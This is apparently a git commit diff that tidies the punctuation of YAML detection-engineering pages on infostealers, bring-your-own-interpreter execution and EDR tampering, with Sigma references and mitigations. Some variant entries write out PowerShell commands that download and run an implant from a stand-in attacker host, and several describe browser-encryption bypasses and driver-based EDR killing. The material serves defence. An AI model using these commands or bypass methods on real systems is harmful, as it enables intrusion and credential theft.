refactor: clean up writing style across all chokepoint pages

Remove em dashes from prose throughout all 7 remaining chokepoints,
replacing with periods, commas, or semicolons for tighter writing.
Remove AttackerControls/AttackerCannotControl bulleted lists (redundant
with chokepoint stage descriptions). Intel reference names preserved.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
This commit is contained in:
imposter
2026-04-09 14:57:48 -06:00
co-authored by Claude Opus 4.6
parent 8a3b14a987
commit d54c031940
7 changed files with 154 additions and 238 deletions
@@ -15,13 +15,13 @@ Techniques:
DetectionPriority: CRITICAL
ThreatPrevalence: HIGH
DetectionDifficulty: MEDIUM
Description: 'Infostealers systematically harvest credentials, cookies, and autofill data from browser credential databases
— the single invariant behavior across all stealer families regardless of obfuscation or bypass technique. Hudson Rock tracks
Description: 'Infostealers systematically harvest credentials, cookies, and autofill data from browser credential databases.
This is the single invariant behavior across all stealer families regardless of obfuscation or bypass technique. Hudson Rock tracks
30+ million infected computers; 1.8 billion credentials were stolen in 2025 alone, with enterprise credentials present in
14% of infections (up from 6% in early 2024). The Snowflake breach (2024) demonstrated downstream impact: UNC5537 used infostealer-harvested
credentials for initial access to 160+ organizations. LummaC2 (51% of dark web credential logs before its May 2025 takedown),
Stealc, RedLine, Raccoon, Vidar, AMOS, and Medusa all share the invariant: the stealer process must open browser credential
files (Login Data, Cookies, logins.json) and invoke CryptUnprotectData() or NSS3 decryption — a kernel-observable event
files (Login Data, Cookies, logins.json) and invoke CryptUnprotectData() or NSS3 decryption. This is a kernel-observable event
regardless of family or Chrome App-Bound Encryption bypass technique used.
'
@@ -112,7 +112,7 @@ Variations:
VariantId: vidar-2-0
Command:
Invocation: "# Pure C rewrite (October 2025):\n# Memory injection into chrome.exe for ABE bypass\n# Calls decryption APIs from within trusted Chrome context\n# Bypasses ABE without COM or CDP"
Context: 'Complete rewrite. Memory injection into chrome.exe to call decryption from trusted context — most sophisticated ABE bypass documented.'
Context: 'Complete rewrite. Memory injection into chrome.exe to call decryption from trusted context. Most sophisticated ABE bypass documented.'
Artifacts:
- 'Sysmon EID 10: Process access to chrome.exe with PROCESS_ALL_ACCESS'
- 'Sysmon EID 8: CreateRemoteThread into chrome.exe from non-browser process'
@@ -123,7 +123,7 @@ Variations:
SourceURL: https://www.sentinelone.com/blog/atomic-stealer-threat-actor-spawns-second-variant-of-macos-malware-sold-on-telegram/
Notes: 'macOS-targeting infostealer marketed on Telegram for ~$1,000/month. Targets Safari Keychain, all Chromium browsers,
Firefox, MetaMask, cryptocurrency wallets, and system information. Uses osascript to prompt for administrator password,
bypassing macOS protections. Demonstrates that the browser credential database chokepoint applies cross-platform — macOS
bypassing macOS protections. Demonstrates that the browser credential database chokepoint applies cross-platform. macOS
browsers use platform-native keychain APIs but the file access pattern is identical.
'
@@ -140,7 +140,7 @@ Variations:
FirstSeen: 2025-Q2
Status: Active
SourceURL: https://thehackernews.com/2025/05/eddiestealer-malware-uses-clickfix.html
Notes: 'Identified May 2025; notable for Chrome App-Bound Encryption bypass via Chrome DevTools Protocol (CDP) — connects
Notes: 'Identified May 2025; notable for Chrome App-Bound Encryption bypass via Chrome DevTools Protocol (CDP). Connects
to a running Chrome instance in debug mode to extract cookies without needing to decrypt the database directly. Represents
the third major App-Bound bypass approach (alongside COM elevation and memory injection).
@@ -157,7 +157,7 @@ Variations:
FirstSeen: 2024-Q1
Status: Active
SourceURL: https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web
Notes: 'Supports credential harvesting from 100+ browsers — the broadest browser coverage of any tracked stealer family.
Notes: 'Supports credential harvesting from 100+ browsers, the broadest browser coverage of any tracked stealer family.
Targets all Chromium and Gecko-based browsers, Electron apps storing credentials, and password managers. MaaS subscription
model on dark web forums. Demonstrates that comprehensive browser coverage is a competitive differentiator in the stealer
market.
@@ -166,7 +166,7 @@ Variations:
VariantId: medusa-stealer
Command:
Invocation: "# Broadest coverage: 100+ browsers\n# Targets Chromium, Gecko, Electron apps\n# Also targets password manager databases\n# Same DPAPI/NSS3 decryption pattern"
Context: '100+ browser support — broadest coverage. Also targets Electron apps and password managers. MaaS subscription model.'
Context: '100+ browser support; broadest coverage. Also targets Electron apps and password managers. MaaS subscription model.'
Artifacts:
- 'Sysmon EID 10: Non-browser process accessing 100+ browser profile paths'
- 'Sysmon EID 3: Large HTTP POST exfil (high volume from broad targeting)'
@@ -195,7 +195,7 @@ Variations:
Status: Active
SourceURL: https://www.infostealers.com/article/exclusive-look-inside-a-compromised-north-korean-apt-machine-linked-to-the-biggest-heist-in-history/
Notes: 'North Korean threat actors (LAZARUS GROUP / HIDDEN COBRA) incorporated infostealer deployment into their tradecraft
for financial operations. Connected to the February 2025 ByBit cryptocurrency exchange heist ($1.5B — the largest cryptocurrency
for financial operations. Connected to the February 2025 ByBit cryptocurrency exchange heist ($1.5B, the largest cryptocurrency
theft in history). Hudson Rock 2026 trend report highlights the "infostealer-to-APT pipeline" where stealer credentials
enable nation-state initial access without traditional spearphishing. Demonstrates infostealers as strategic intelligence-gathering
tools, not just commodity theft.
@@ -206,7 +206,7 @@ Variations:
Invocation: "# NK groups use commodity stealers + custom tools:\n# Deployed via trojanized crypto/DeFi apps\n# Credential theft feeds financial operations\n# ByBit heist ($1.5B, Feb 2025) used stealer credentials"
Context: 'LAZARUS GROUP incorporated commodity infostealers for financial operations. Stealer credentials enable initial access to crypto exchanges.'
Artifacts:
- 'Same as commodity stealer artifacts — Login Data access, DPAPI calls'
- 'Same as commodity stealer artifacts. Login Data access, DPAPI calls.'
- 'Additional: Crypto wallet file access (wallet.dat, keystore files)'
ChokepointMapping: 'Commodity stealer deployed → credentials harvested → NK APT uses for financial target access'
- Name: Contagious Interview (OtterCookie / North Korean Fake Job Interview Stealer)
@@ -247,29 +247,17 @@ Prerequisites:
- Code execution on victim machine (via ClickFix, malvertising, cracked software, game cheats, SEO poisoning, YouTube malware,
or social engineering)
- Target must use a Chromium-based browser (Chrome, Edge, Brave, Opera, etc.) or Firefox
- Browser credential database files must be accessible (not locked by exclusive handle — Chrome Login Data is typically not
- Browser credential database files must be accessible (not locked by exclusive handle; Chrome Login Data is typically not
exclusively locked)
- For App-Bound Encryption bypass variants: Chrome must be installed (COM elevation requires GoogleChromeElevationService);
OR Chrome must be running (CDP bypass); OR stealer must have code injection capability (memory injection bypass)
- Outbound network access for C2 exfiltration (though some variants stage locally and exfiltrate via separate channel)
AttackerControls:
- Stealer family (LummaC2, RedLine, Raccoon, Vidar, AMOS)
- Delivery method (ClickFix, malvertising, phishing)
- App-Bound Encryption bypass technique (COM, CDP, injection)
- Obfuscation and packing of the stealer binary
- Exfiltration method (HTTP POST, Telegram, Discord)
AttackerCannotControl:
- Must open browser credential database files (Login Data, Cookies)
- Must decrypt credentials via DPAPI, NSS3, COM elevation, CDP, or process injection into a trusted browser context
- File access event is logged when credential DB is opened
- API call to decryption function is observable via ETW/AMSI
- Exfiltration of harvested data requires outbound connection
Chokepoints:
- Stage: Credential Database Access
Input: Stealer process is running on the victim machine
Invariant: Must open browser credential database files (Login Data, Cookies, Local State, logins.json) —
these are the only locations where browser credentials are stored
Observable: 'Sysmon EID 11 (FileCreate — stealer copies credential DB to temp) or Windows Security
Invariant: Must open browser credential database files (Login Data, Cookies, Local State, logins.json).
These are the only locations where browser credentials are stored.
Observable: 'Sysmon EID 11 (FileCreate; stealer copies credential DB to temp) or Windows Security
EID 4663 (Object Access audit) showing a non-browser process accessing Chrome/Edge/Firefox credential files'
WhyCantBypass: Browser credentials only exist in these database files. The stealer must read them.
There is no alternative path to the credentials.
@@ -281,7 +269,7 @@ Chokepoints:
SigmaRef: sigma-rules/browser-credential-theft/hunt.yml
- Stage: Credential Decryption
Input: Credential database content has been read
Invariant: Must invoke platform decryption APIs — CryptUnprotectData() (DPAPI) for Chromium browsers,
Invariant: Must invoke platform decryption APIs. CryptUnprotectData() (DPAPI) for Chromium browsers,
NSS3 decryption for Firefox, or an App-Bound Encryption bypass technique
Observable: 'CryptUnprotectData calls from non-browser processes. Chrome Elevation Service COM interface
activation. Chrome DevTools Protocol connections to running Chrome instances (CDP bypass).'
@@ -355,9 +343,9 @@ EvolutionTimeline:
Variants: []
EventType: event
- Date: 2024-Q2
Event: Snowflake breach — infostealer credentials enable access to 160+ organizations
Event: 'Snowflake breach: infostealer credentials enable access to 160+ organizations'
Change: 'UNC5537 uses credentials harvested by VIDAR, RISEPRO, REDLINE, RACCOON, LUMMA, and METASTEALER from contractor
machines to access Snowflake cloud environments. No MFA, no network allowlisting — credentials alone were sufficient.
machines to access Snowflake cloud environments. No MFA, no network allowlisting. Credentials alone were sufficient.
Victims include Ticketmaster (560M records), AT&T (109M call records), Advance Auto Parts, LendingTree, and 155+ others.
Demonstrates infostealers as an enterprise security problem, not just consumer credential theft.
@@ -371,15 +359,15 @@ EvolutionTimeline:
Variants: []
EventType: event
- Date: 2024-Q3
Event: Chrome App-Bound Encryption (July 2024) — bypassed within ~45 days
Change: 'Google introduces App-Bound Encryption in Chrome 127 (released July 2024) — encrypts cookie/credential database
Event: Chrome App-Bound Encryption (July 2024); bypassed within ~45 days
Change: 'Google introduces App-Bound Encryption in Chrome 127 (released July 2024), encrypting cookie/credential databases
with a key tied to the Chrome application identity, preventing decryption by other processes using standard DPAPI. Multiple
stealers immediately begin research. First bypass via COM elevation to GoogleChromeElevationService documented September
2024. CDP-based bypass (EDDIESTEALER) and memory injection (Vidar 2.0) follow within months.
'
DetectionImpact: 'App-Bound Encryption forces stealers to generate new observable behaviors: COM elevation calls to GoogleChromeElevationService,
Chrome debug mode activation, or injection into chrome.exe — all of which create additional detection opportunities. DPAPI
Chrome debug mode activation, or injection into chrome.exe. All of these create additional detection opportunities. DPAPI
call still occurs in all bypass variants; the invariant is preserved.
'
@@ -390,10 +378,10 @@ EvolutionTimeline:
Event: RedLine and META Stealer disrupted (Operation Magnus); LummaC2 reaches 51% market share
Change: 'October 2024: Europol Operation Magnus disrupts RedLine and META Stealer infrastructure; arrests in multiple countries.
Raccoon Stealer administrator pleads guilty. Market consolidates around LummaC2 and Stealc. Enterprise credential presence
in infostealers reaches 14% of infections (up from 6% in early 2024) — demonstrating shift toward higher-value targeting.
in infostealers reaches 14% of infections (up from 6% in early 2024), demonstrating a shift toward higher-value targeting.
'
DetectionImpact: 'Law enforcement disruption has limited sustained impact — new variants emerge within weeks of each takedown.
DetectionImpact: 'Law enforcement disruption has limited sustained impact. New variants emerge within weeks of each takedown.
File-based and hash-based IOC sharing becomes less effective as market fragments. Behavioral detection of the invariant
(file access + DPAPI call) remains the only durable detection approach.
@@ -402,11 +390,11 @@ EvolutionTimeline:
Variants: []
EventType: event
- Date: 2025-Q1
Event: ByBit heist ($1.5B) — North Korean APT uses infostealer-to-APT pipeline
Event: 'ByBit heist ($1.5B): North Korean APT uses infostealer-to-APT pipeline'
Change: 'February 2025: Lazarus Group / TraderTraitor executes $1.5B ByBit cryptocurrency heist via supply chain compromise
of Safe(Wallet) — a developer''s workstation was compromised via social engineering, and malicious code was injected into
of Safe(Wallet). A developer''s workstation was compromised via social engineering, and malicious code was injected into
the transaction signing UI. Credentials (potentially infostealer-harvested) may have enabled the initial developer compromise.
Demonstrates the "infostealer-to-APT pipeline" — commodity stealer infections enabling nation-state operations. Hudson
Demonstrates the "infostealer-to-APT pipeline": commodity stealer infections enabling nation-state operations. Hudson
Rock (February 2026) identifies this as a primary 2026 trend: sophisticated APTs systematically purchasing or harvesting
infostealer logs.
@@ -422,7 +410,7 @@ EvolutionTimeline:
- Date: 2025-Q2
Event: LummaC2 disrupted (May 2025); 1.8 billion credentials stolen in 2025
Change: 'FBI/Europol joint operation disrupts LummaC2 infrastructure; domains seized, C2 servers taken offline. 1.7 million
unique LummaC2 logs were already in circulation. Market immediately begins reconstituting — historical precedent (Raccoon
unique LummaC2 logs were already in circulation. Market immediately begins reconstituting. Historical precedent (Raccoon
v1 → v2, RedLine → successors) indicates 60-90 day reconstitution timeline.
'
@@ -460,7 +448,7 @@ Detections:
LogSources:
- Sysmon Event ID 10 (Process Access)
- Sysmon Event ID 11 (File Created / File Access)
- Windows Security Event ID 4663 (File Access — requires Object Access auditing)
- Windows Security Event ID 4663 (File Access; requires Object Access auditing)
- EDR file open telemetry (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint)
Logic: "File Access (EID 4663 or Sysmon EID 10/11):\n TargetObject / TargetFilename:\n contains: \\Google\\Chrome\\\
User Data\\Default\\Login Data\n OR contains: \\Google\\Chrome\\User Data\\Default\\Cookies\n OR contains: \\Google\\\
@@ -480,7 +468,7 @@ Detections:
LogSources:
- Sysmon Event ID 10 (Process Access to browser files)
- Windows Security Event ID 4663 (File Access)
- Sysmon Event ID 8 (CreateRemoteThread — for injection variants)
- Sysmon Event ID 8 (CreateRemoteThread; for injection variants)
- 'Windows API monitoring: CryptUnprotectData calls from non-browser processes'
- EDR behavioral telemetry
Logic: "File Access to browser credential path:\n AccessingProcess: NOT browser / NOT known password manager / NOT backup\
@@ -494,8 +482,8 @@ Detections:
'
SigmaRule: sigma-rules/browser-credential-theft/hunt.yml
- Level: Analyst
Description: 'Non-browser process accesses browser credential database AND makes outbound network connection — complete
infostealer execution chain with C2 exfiltration signal
Description: 'Non-browser process accesses browser credential database AND makes outbound network connection. Complete
infostealer execution chain with C2 exfiltration signal.
'
LogSources:
@@ -545,7 +533,7 @@ Intel:
Tier: primary
URL: https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion/
Description: 'Technical analysis of the Snowflake breach (May-June 2024); documents UNC5537''s use of VIDAR, RISEPRO, REDLINE,
RACCOON, LUMMA, and METASTEALER-harvested credentials to access 160+ Snowflake environments. No CVE exploitation — credentials
RACCOON, LUMMA, and METASTEALER-harvested credentials to access 160+ Snowflake environments. No CVE exploitation. Credentials
alone were sufficient. Defines infostealer credentials as a primary enterprise supply chain risk.
'
@@ -564,14 +552,14 @@ OsintSources:
Query: behavior_files:"Login Data" behavior_files:"Local State" positives:0
URL: https://www.virustotal.com/gui/search/behavior_files%3A%22Login+Data%22+behavior_files%3A%22Local+State%22+positives%3A0
Notes: 'Requires VT Intelligence subscription. Finds samples that access both Login Data and Local State files (combined
access is a strong infostealer behavioral indicator) while currently evading AV detection — the most dangerous variants
access is a strong infostealer behavioral indicator) while currently evading AV detection. These are the most dangerous variants
in active circulation.
'
- Platform: Shodan
Query: http.html:"stealer" http.html:"logs" http.html:"panel"
URL: https://www.shodan.io/search?query=http.html%3A%22stealer%22+http.html%3A%22logs%22
Notes: 'Finds exposed infostealer C2 panels — often left accessible due to poor OpSec by stealer operators. Log panels with
Notes: 'Finds exposed infostealer C2 panels, often left accessible due to poor OpSec by stealer operators. Log panels with
"logs" and "panel" in the HTML indicate active infrastructure. Useful for tracking active campaign infrastructure and
reporting to law enforcement or domain registrars.
@@ -580,10 +568,10 @@ OsintSources:
Query: 'page.title:"Join meeting" NOT domain:zoom.us NOT domain:teams.microsoft.com NOT domain:meet.google.com NOT domain:webex.com NOT domain:gotomeeting.com'
URL: https://urlscan.io/search/#page.title%3A%22Join%20meeting%22%20NOT%20domain%3Azoom.us%20NOT%20domain%3Ateams.microsoft.com%20NOT%20domain%3Ameet.google.com%20NOT%20domain%3Awebex.com%20NOT%20domain%3Agotomeeting.com
Notes: 'Finds fake meeting join pages impersonating Zoom, Teams, Google Meet, and Webex on non-legitimate
domains. Common stealer delivery pretext — fake meeting links drop infostealers. Swap title for other
domains. Common stealer delivery pretext. Fake meeting links drop infostealers. Swap title for other
pretexts: "Sign in - Slack" (Slack), "Microsoft Teams" (Teams), "Download Zoom" (fake installers).'
KnownBypasses:
- Bypass: Chrome App-Bound Encryption (July 2024) — encrypts credential database against non-Chrome access
- Bypass: Chrome App-Bound Encryption (July 2024); encrypts credential database against non-Chrome access
Mitigation: 'Enable Chrome App-Bound Encryption (Chrome 127+, enabled by default on Windows). Monitor GoogleChromeElevationService
COM access from non-update processes. Enforce MFA everywhere to limit value of stolen credentials.
@@ -591,11 +579,11 @@ KnownBypasses:
Detection: 'App-Bound bypass generates new observable behaviors regardless of technique: (1) COM elevation: unexpected COM
activation of GoogleChromeElevationService from non-updater process; (2) CDP bypass: Chrome launched with --remote-debugging-port
flag by non-Chrome process; (3) Memory injection: PROCESS_VM_READ access to chrome.exe from non-trusted process (Sysmon
EID 10). All variants still ultimately call CryptUnprotectData() — monitoring that API from non-browser processes remains
EID 10). All variants still ultimately call CryptUnprotectData(). Monitoring that API from non-browser processes remains
effective even against App-Bound bypasses.
'
- Bypass: Process injection into chrome.exe (Vidar 2.0) — calls DPAPI from within trusted Chrome process context
- Bypass: Process injection into chrome.exe (Vidar 2.0); calls DPAPI from within trusted Chrome process context
Mitigation: 'Enable Windows Defender Credential Guard. Monitor for unexpected memory operations on chrome.exe (cross-process
memory reads/writes). Restrict process injection via Attack Surface Reduction rules or Exploit Protection settings.
@@ -605,7 +593,7 @@ KnownBypasses:
rights. Named pipe creation by injected thread is an additional Vidar 2.0 specific indicator.
'
- Bypass: Copying Login Data to TEMP before access — avoids locking issues, may bypass some EDR path-based rules
- Bypass: Copying Login Data to TEMP before access; avoids locking issues, may bypass some EDR path-based rules
Mitigation: Monitor file copy operations where source path matches browser credential paths
Detection: 'Sysmon EID 11 (FileCreated) where TargetFilename matches TEMP path and Image (creating process) is NOT a browser
process. Follow with file access monitoring on the copied file. Process copying browser files to temp directories is a
@@ -619,16 +607,16 @@ KnownBypasses:
Google LLC, Microsoft Corporation, Brave Software, etc. Unsigned "chrome.exe" is a high-confidence malware indicator.
'
- Bypass: Firefox NSS3 decryption (no DPAPI dependency) — different API path from Chromium
- Bypass: Firefox NSS3 decryption (no DPAPI dependency); different API path from Chromium
Mitigation: Monitor NSS3.dll / nss3.dll load by non-Firefox processes; monitor access to key4.db
Detection: 'Sysmon EID 7 (ImageLoaded): nss3.dll loaded by a process that is NOT firefox.exe, thunderbird.exe, or a known
Mozilla product. Access to key4.db or logins.json by non-Firefox process. These are the Firefox equivalent of the Chromium
Login Data access signal.
'
- Bypass: MFA session cookie theft (T1539) — bypasses MFA even after password reset
- Bypass: MFA session cookie theft (T1539); bypasses MFA even after password reset
Mitigation: 'Enforce session lifetime limits (max 1 hour for sensitive applications). Implement device binding for sessions.
Use hardware security keys (FIDO2) — session cookies stolen from FIDO2-authenticated sessions cannot be reused without
Use hardware security keys (FIDO2). Session cookies stolen from FIDO2-authenticated sessions cannot be reused without
the physical key.
'
@@ -669,7 +657,7 @@ RawLogs:
- Type: Windows Event Log
EventId: 4663
Source: Microsoft-Windows-Security-Auditing
Description: Audit file access — non-browser process reads the Login Data credential database
Description: Audit file access. Non-browser process reads the Login Data credential database.
MatchedRules:
- Research
- Analyst
@@ -733,10 +721,10 @@ RawLogs:
- Type: Sysmon
EventId: 8
Source: Microsoft-Windows-Sysmon/Operational
Description: CryptUnprotectData API call observed via Sysmon API monitoring — DPAPI decryption of harvested credentials
Description: CryptUnprotectData API call observed via Sysmon API monitoring. DPAPI decryption of harvested credentials.
MatchedRules:
- Hunt
Sample: 'EventID: 8 (CreateRemoteThread) — or via API monitoring:
Sample: 'EventID: 8 (CreateRemoteThread), or via API monitoring:
UtcTime: 2024-09-14 03:17:43.108
@@ -795,7 +783,7 @@ RawLogs:
# Non-browser process making HTTPS connection within seconds of credential DB access
# is the Analyst rule''s final signal — high confidence, low FP.
# is the Analyst rule''s final signal. High confidence, low FP.
'
EmulationScript:
@@ -36,29 +36,29 @@ Author: '@iimp0ster'
Chokepoints:
- Stage: Interpreter Deployment
Input: Attacker has code execution on the target
Invariant: A non-default scripting interpreter runtime must be introduced to the system — either written to disk as a
Invariant: A non-default scripting interpreter runtime must be introduced to the system, either written to disk as a
standalone binary or loaded in-memory as embedded DLLs within a .NET host process (IronPython, Boolang)
Observable: 'Disk-based: Sysmon EID 11 showing a vendor-signed interpreter binary (python.exe, php.exe, node.exe) written
to a user-writable directory. In-memory: Sysmon EID 7 showing interpreter DLLs (IronPython.dll, Microsoft.Scripting.dll)
loaded by a .NET host process.'
WhyCantBypass: The interpreter runtime is required to parse and execute scripts — it cannot be replaced by a native OS
WhyCantBypass: The interpreter runtime is required to parse and execute scripts. It cannot be replaced by a native OS
component without losing language compatibility. Whether deployed as a binary or embedded DLLs, the runtime must be present.
LogSources:
- Sysmon Event ID 11 (File Create)
- Sysmon Event ID 1 (Process Creation — archive extraction)
- Sysmon Event ID 1 (Process Creation, archive extraction)
- Windows Security Event ID 4688 (Process Creation)
DetectionTier: Research
SigmaRef: sigma-rules/byosi/research.yml
- Stage: Interpreter Execution
Input: Interpreter runtime is available — either as a binary on disk or as embedded DLLs in a host process
Input: Interpreter runtime is available, either as a binary on disk or as embedded DLLs in a host process
Invariant: The non-default interpreter binary must be launched as a new process to run attacker scripts.
Observable: 'Sysmon EID 1 showing python.exe, node.exe, php.exe, etc. running from a non-standard path
(not Program Files). Command line may reveal the script being executed or inline code.'
WhyCantBypass: Script files require their matching interpreter process to execute — there is no way to run Python/PHP/Node scripts without spawning the interpreter.
WhyCantBypass: Script files require their matching interpreter process to execute. There is no way to run Python/PHP/Node scripts without spawning the interpreter.
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4688 (Process Creation)
- Sysmon Event ID 7 (Image Loaded — interpreter DLLs)
- Sysmon Event ID 7 (Image Loaded, interpreter DLLs)
DetectionTier: Hunt
SigmaRef: sigma-rules/byosi/hunt.yml
- Stage: Malicious Script Action
@@ -66,7 +66,7 @@ Chokepoints:
Invariant: The interpreter must load attacker-controlled script content and perform an observable action (network connection, file write, process spawn, credential access).
Observable: 'Sysmon EID 3 showing outbound connections from the interpreter process. EID 1 showing child processes
spawned by the interpreter. EID 11/12/13 showing file or registry modifications.'
WhyCantBypass: The script must interact with the OS to achieve its objective — C2 callbacks require network, data theft requires file/process access, persistence requires registry/filesystem writes.
WhyCantBypass: The script must interact with the OS to achieve its objective. C2 callbacks require network, data theft requires file/process access, persistence requires registry/filesystem writes.
LogSources:
- Sysmon Event ID 3 (Network Connection)
- Sysmon Event ID 1 (Child Process Creation)
@@ -90,7 +90,7 @@ Variations:
unable to scan PHP file types.
VariantId: byosi-php-shell
Command:
Invocation: "# Four lines of PowerShell — evaded CrowdStrike, Trellix, SentinelOne:\nInvoke-WebRequest -Uri \"hxxps[://]windows.php.net/downloads/releases/php-8.2.0-nts-Win32-vs16-x64.zip\" -OutFile \"$env:TEMP\\php.zip\"\nExpand-Archive \"$env:TEMP\\php.zip\" -DestinationPath \"C:\\Temp\\php\"\nInvoke-WebRequest -Uri \"hxxps[://]attacker[.]com/implant.php\" -OutFile \"C:\\Temp\\php\\shell.php\"\nC:\\Temp\\php\\php.exe C:\\Temp\\php\\shell.php"
Invocation: "# Four lines of PowerShell. Evaded CrowdStrike, Trellix, SentinelOne:\nInvoke-WebRequest -Uri \"hxxps[://]windows.php.net/downloads/releases/php-8.2.0-nts-Win32-vs16-x64.zip\" -OutFile \"$env:TEMP\\php.zip\"\nExpand-Archive \"$env:TEMP\\php.zip\" -DestinationPath \"C:\\Temp\\php\"\nInvoke-WebRequest -Uri \"hxxps[://]attacker[.]com/implant.php\" -OutFile \"C:\\Temp\\php\\shell.php\"\nC:\\Temp\\php\\php.exe C:\\Temp\\php\\shell.php"
Context: 'Original BYOSI PoC. Downloads official PHP for Windows, extracts to C:\Temp\php, fetches PHP implant, executes. SentinelOne confirmed unable to scan PHP file types.'
Artifacts:
- 'Sysmon EID 11: php.exe written to C:\Temp\php\'
@@ -108,7 +108,7 @@ Variations:
VariantId: polydrop-multi-language
Command:
Invocation: "# Supports 13 languages. Example with Ruby:\nInvoke-WebRequest -Uri \"hxxps[://]github.com/.../rubyinstaller-3.2.2-1-x64.exe\" -OutFile \"$env:TEMP\\ruby.exe\"\nStart-Process \"$env:TEMP\\ruby.exe\" -ArgumentList \"/silent\" -Wait\nInvoke-WebRequest -Uri \"hxxps[://]attacker[.]com/payload.rb\" -OutFile \"$env:TEMP\\payload.rb\"\nruby.exe \"$env:TEMP\\payload.rb\""
Context: 'Expanded BYOSI toolkit supporting 13 languages. Each interpreter is legitimately signed — EDR trusts the binary, cannot scan the script.'
Context: 'Expanded BYOSI toolkit supporting 13 languages. Each interpreter is legitimately signed. EDR trusts the binary and cannot scan the script.'
Artifacts:
- 'Sysmon EID 11: Non-default interpreter binary written to TEMP/AppData'
- 'Sysmon EID 1: Interpreter running from non-standard path'
@@ -125,7 +125,7 @@ Variations:
without touching PowerShell.
VariantId: ironnetinjector-turla-ironpython
Command:
Invocation: "# IronPython embedded via .NET:\n# Malicious Python scripts loaded into memory via IronPython runtime\n# No python.exe on disk — uses .NET-hosted IronPython DLLs\n# Injects Turla tools into legitimate processes"
Invocation: "# IronPython embedded via .NET:\n# Malicious Python scripts loaded into memory via IronPython runtime\n# No python.exe on disk. Uses .NET-hosted IronPython DLLs\n# Injects Turla tools into legitimate processes"
Context: 'Turla APT. Uses IronPython via .NET to avoid dropping python.exe. Loads malicious .py scripts in memory. Documented by Unit 42.'
Artifacts:
- 'Sysmon EID 7: IronPython DLLs loaded (IronPython.dll, Microsoft.Scripting.dll)'
@@ -196,7 +196,7 @@ Variations:
VariantId: byoi-dotnet-embedded-interpreters
Command:
Invocation: "# .NET application embeds Boolang or IronPython runtime:\n# No standalone interpreter binary on disk\n# Scripts loaded from embedded resources or fetched remotely\n# Executes within the .NET host process"
Context: 'Interpreter embedded within .NET application — no standalone binary to detect on disk. Scripts execute within the .NET host process memory.'
Context: 'Interpreter embedded within .NET application. No standalone binary to detect on disk. Scripts execute within the .NET host process memory.'
Artifacts:
- 'Sysmon EID 7: Boolang or IronPython DLLs loaded by .NET process'
- 'Sysmon EID 1: .NET host with interpreter-related assemblies'
@@ -224,18 +224,6 @@ Prerequisites:
- The scripting interpreter must be a legitimately signed binary compatible with the target OS
- Attacker-controlled script content must be accessible to the interpreter (local file, inline argument, or remote fetch)
- No application whitelisting policy blocking execution of the specific interpreter binary from non-standard paths
AttackerControls:
- Choice of interpreter (Python, PHP, Node.js, Ruby, Perl, AutoHotKey)
- Obfuscation of the script payload
- Script content and payload
- Delivery method for the interpreter
- Persistence mechanism for the interpreter
AttackerCannotControl:
- Must introduce a non-default interpreter runtime (binary on disk or DLLs loaded in-memory)
- Must launch the interpreter process or load interpreter DLLs into a host
- Interpreter binary/DLLs are vendor-signed (legitimate code)
- Process creation or DLL load event logs the non-standard interpreter
- Network connections from the interpreter are logged
EvolutionTimeline:
- Date: 2019-Q3
@@ -349,7 +337,7 @@ Detections:
ExpectedFPRate: Medium
UseCase: >
Active threat hunting for BYOSI deployment. Correlates interpreter execution with
script loading or network callback — the two behaviors that distinguish malicious
script loading or network callback, the two behaviors that distinguish malicious
from benign interpreter presence.
SigmaRule: sigma-rules/byosi/hunt.yml
@@ -443,7 +431,7 @@ OsintSources:
Query: 'filename:php.exe OR filename:node.exe OR filename:python.exe OR filename:ruby.exe'
URL: https://urlscan.io/search/#filename%3Aphp.exe%20OR%20filename%3Anode.exe%20OR%20filename%3Apython.exe%20OR%20filename%3Aruby.exe
Notes: >
Finds websites hosting interpreter binaries packaged in ZIP archives — a common
Finds websites hosting interpreter binaries packaged in ZIP archives, a common
BYOSI delivery mechanism. Cross-reference with known malware distribution domains.
References:
@@ -17,9 +17,9 @@ ThreatPrevalence: HIGH
DetectionDifficulty: HIGH
Description: 'Adversaries impair or neutralize EDR/AV products before executing their primary payload to prevent detection
and response. Techniques span from user-mode API unhooking (removing hooks EDRs inject into ntdll.dll) through kernel-level
driver exploitation (BYOVD — Bring Your Own Vulnerable Driver) to direct process termination of security tools. Despite
driver exploitation (BYOVD, Bring Your Own Vulnerable Driver) to direct process termination of security tools. Despite
the diversity of techniques, the chokepoint is invariant: admin/SYSTEM privileges are always required, and the bypass mechanism
always produces a kernel-observable artifact — a driver load event, a VirtualProtect call against protected system memory,
always produces a kernel-observable artifact. This is a driver load event, a VirtualProtect call against protected system memory,
or direct termination of a security process. As of 2024, approximately 48% of high-severity ransomware attacks incorporate
purpose-built EDR disablement (Cisco Talos). BYOVD has become a de facto phase in major ransomware deployment chains.
@@ -96,7 +96,7 @@ Variations:
SourceURL: https://www.sophos.com/en-us/blog/burnt-cigar-2/
NotesShort: Purpose-built malicious driver with stolen certs; EDR wiper capability since 2024
Notes: 'Custom-built kernel driver (POORTRY) with dedicated userland loader (STONESTOP). Not a repurposed vulnerable
driver — purpose-built malicious driver signed with stolen/forged certificates. Used by Cuba, BlackCat, Medusa, LockBit,
driver. It is a purpose-built malicious driver signed with stolen/forged certificates. Used by Cuba, BlackCat, Medusa, LockBit,
RansomHub. Evolved from process termination to full EDR file wiping in 2024.'
VariantId: byovd-poortry-stonestop
Command:
@@ -104,7 +104,7 @@ Variations:
idmtdi.sys / Internet Download Manager)\n \u2192 driver signed with stolen cert (rotates: \"bopsoft\", \"Evangel
Technology\", \"FEI XIAO\", etc.)\n \u2192 sends IOCTLs to:\n a) Remove kernel notify callbacks\n b) Terminate
EDR processes\n c) Delete EDR files from disk (2024+ capability)"
Context: 'Certificate roulette — multiple variants with different certs deployed in same attack. 2024+: deletes EDR
Context: 'Certificate roulette: multiple variants with different certs deployed in same attack. 2024+: deletes EDR
executable files and DLLs from disk. Operates in two deletion modes: by file type or by specific filename.'
Artifacts:
- 'Sysmon EID 11: Driver file dropped, masquerading as legitimate software driver'
@@ -118,7 +118,7 @@ Variations:
FirstSeen: 2022-Q1
Status: Active
SourceURL: https://github.com/wavestone-cdt/EDRSandblast
NotesShort: Removes kernel callbacks without killing EDR processes — EDR runs blind
NotesShort: Removes kernel callbacks without killing EDR processes. EDR runs blind.
